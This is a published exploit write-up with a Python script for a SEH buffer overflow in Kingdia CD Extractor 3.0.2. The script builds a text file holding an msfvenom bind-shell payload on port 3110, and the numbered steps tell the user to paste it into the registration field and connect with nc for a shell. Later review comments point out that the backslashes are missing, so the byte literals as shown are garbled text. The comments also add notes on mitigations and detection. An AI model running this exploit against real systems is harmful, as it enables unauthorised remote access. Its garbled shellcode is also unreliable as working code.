Authored by Achilles

Kingdia CD Extractor version 3.0.2 suffers from a SEH buffer overflow vulnerability.

# Exploit Title: Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)
# Date: 31.10.2021
# Software Link: https://en.softonic.com/download/kingdia-cd-extractor/windows/post-download
# Exploit Author: Achilles
# Tested Version: 3.0.2
# Tested on: Windows 7 64bit

# 1.- Run python code : Kingdia.py
# 2.- Open EVIL.txt and copy All content to Clipboard
# 3.- Open Kingdia CD Extractor and press Register
# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
# 5.- Click 'OK'
# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell
# 7.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python

import struct

# --- SEH-overwrite layout, as laid out by the author ---
# NOTE(review): the transcription dropped every backslash, so as written these
# are literal "x41" / "xEB" text strings (three characters per intended byte),
# not byte escapes; the lengths the script measures are therefore not the ones
# the author worked with.
buffer = "x41" * 256   # filler up to the SEH record (intended: 256 bytes of 0x41)
nseh = "xEBx06x90x90" # overwrites the next-SEH pointer; EB 06 is the author's "jmp short 6", padded with two NOPs
seh = struct.pack('<L',0x10037859) # overwritten handler pointer, little-endian; the author places it in SkinMagic.dll (why that module/offset was chosen is not verifiable from here)
nops = "x90" * 20      # NOP sled in front of the stage payload (intended: 20 bytes of 0x90)
# Mitigation note: a forged handler chain like this is rejected when SEHOP is
# enabled or when every loaded module is SafeSEH-registered.
#msfvenom -p windows/shell_bind_tcp LPORT=3110 -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d"
# Stage payload: the msfvenom-generated bind-shell stub described in the
# comment above (windows/shell_bind_tcp, LPORT=3110, x86/alpha_mixed encoding).
# NOTE(review): the transcription dropped every backslash here too, so each
# b"x.." literal is plain ASCII text, three characters per intended byte, and
# len(buf) is roughly three times the real stub size.
# Detection angle: per the author's steps a successful run leaves a listener on
# TCP 3110, presumably opened by the exploited application process -- an
# unexpected listening socket from a desktop application is the observable.
buf = b""
buf += b"x89xe0xdbxd9xd9x70xf4x59x49x49x49x49x49"
buf += b"x49x49x49x49x49x49x43x43x43x43x43x43x37"
buf += b"x51x5ax6ax41x58x50x30x41x30x41x6bx41x41"
buf += b"x51x32x41x42x32x42x42x30x42x42x41x42x58"
buf += b"x50x38x41x42x75x4ax49x49x6cx39x78x6cx42"
buf += b"x43x30x73x30x75x50x73x50x4ex69x58x65x70"
buf += b"x31x69x50x32x44x6cx4bx56x30x76x50x6ex6b"
buf += b"x31x42x34x4cx6ex6bx51x42x52x34x6cx4bx71"
buf += b"x62x75x78x36x6fx68x37x73x7ax74x66x65x61"
buf += b"x4bx4fx4cx6cx77x4cx70x61x61x6cx63x32x66"
buf += b"x4cx35x70x79x51x58x4fx54x4dx53x31x79x57"
buf += b"x6dx32x59x62x63x62x31x47x6cx4bx50x52x52"
buf += b"x30x4ex6bx53x7ax37x4cx4cx4bx72x6cx32x31"
buf += b"x51x68x58x63x52x68x56x61x4ex31x53x61x6e"
buf += b"x6bx70x59x37x50x53x31x4bx63x6cx4bx42x69"
buf += b"x57x68x58x63x75x6ax61x59x4cx4bx46x54x6e"
buf += b"x6bx63x31x39x46x34x71x39x6fx4cx6cx5ax61"
buf += b"x5ax6fx44x4dx65x51x59x57x54x78x4bx50x74"
buf += b"x35x4ax56x54x43x33x4dx49x68x37x4bx63x4d"
buf += b"x35x74x70x75x68x64x71x48x6ex6bx50x58x55"
buf += b"x74x46x61x78x53x70x66x4cx4bx74x4cx72x6b"
buf += b"x4ex6bx53x68x45x4cx45x51x38x53x6cx4bx75"
buf += b"x54x6ex6bx55x51x4ex30x4dx59x33x74x35x74"
buf += b"x45x74x43x6bx61x4bx51x71x63x69x63x6ax70"
buf += b"x51x4bx4fx6dx30x43x6fx31x4fx51x4ax4ex6b"
buf += b"x76x72x4ax4bx4cx4dx61x4dx73x58x64x73x57"
buf += b"x42x73x30x43x30x65x38x63x47x51x63x57x42"
buf += b"x61x4fx50x54x61x78x42x6cx33x47x56x46x54"
buf += b"x47x59x6fx59x45x48x38x6ax30x37x71x35x50"
buf += b"x57x70x77x59x6fx34x33x64x32x70x70x68x35"
buf += b"x79x4bx30x32x4bx55x50x79x6fx39x45x43x5a"
buf += b"x47x78x53x69x50x50x58x62x59x6dx51x50x42"
buf += b"x70x31x50x30x50x55x38x48x6ax66x6fx49x4f"
buf += b"x79x70x39x6fx78x55x6dx47x42x48x57x72x37"
buf += b"x70x76x6cx54x66x4bx39x6bx56x63x5ax46x70"
buf += b"x72x76x51x47x55x38x68x42x4bx6bx77x47x75"
buf += b"x37x79x6fx7ax75x43x67x50x68x4cx77x6dx39"
buf += b"x76x58x49x6fx79x6fx69x45x66x37x63x58x33"
buf += b"x44x78x6cx47x4bx38x61x49x6fx39x45x51x47"
buf += b"x6fx67x50x68x42x55x62x4ex50x4dx35x31x69"
buf += b"x6fx38x55x43x58x45x33x62x4dx71x74x35x50"
buf += b"x6bx39x49x73x46x37x50x57x52x77x75x61x58"
buf += b"x76x33x5ax34x52x63x69x33x66x58x62x4bx4d"
buf += b"x73x56x6fx37x77x34x55x74x45x6cx46x61x66"
buf += b"x61x6ex6dx42x64x36x44x54x50x6fx36x63x30"
buf += b"x63x74x36x34x42x70x62x76x72x76x36x36x33"
buf += b"x76x46x36x50x4ex66x36x43x66x30x53x43x66"
buf += b"x71x78x44x39x58x4cx47x4fx4cx46x79x6fx79"
buf += b"x45x4ex69x79x70x62x6ex62x76x57x36x6bx4f"
buf += b"x34x70x30x68x77x78x6bx37x55x4dx33x50x69"
buf += b"x6fx48x55x6dx6bx69x70x67x6dx55x7ax54x4a"
buf += b"x52x48x39x36x4cx55x6fx4dx6dx4dx6bx4fx49"
buf += b"x45x67x4cx34x46x71x6cx37x7ax4bx30x39x6b"
buf += b"x59x70x50x75x73x35x4fx4bx61x57x47x63x61"
buf += b"x62x52x4fx33x5ax55x50x76x33x6bx4fx49x45"
buf += b"x41x41"
# The file is always padded out to exactly 7736 characters: whatever the
# leading parts do not consume is filled with "B".
pad = "B" * (7736 - sum(len(part) for part in (buffer, nseh, seh, nops, buf)))
# Final order on disk: filler | nSEH | SEH | NOP sled | stage payload | padding
payload = buffer + nseh + seh + nops + buf + pad

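# Write the assembled payload to disk.  Python 2 script: `payload` is a plain
# str, so text mode is what the author relies on.  The author's steps refer to
# the file as EVIL.txt; on a case-insensitive Windows filesystem "Evil.txt" is
# the same file.  The context manager closes the handle even when write() fails,
# and only I/O errors are caught -- the original bare `except:` would also have
# hidden NameError/TypeError from the payload construction above.
try:
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except IOError as e:
    print("File cannot be created: %s" % e)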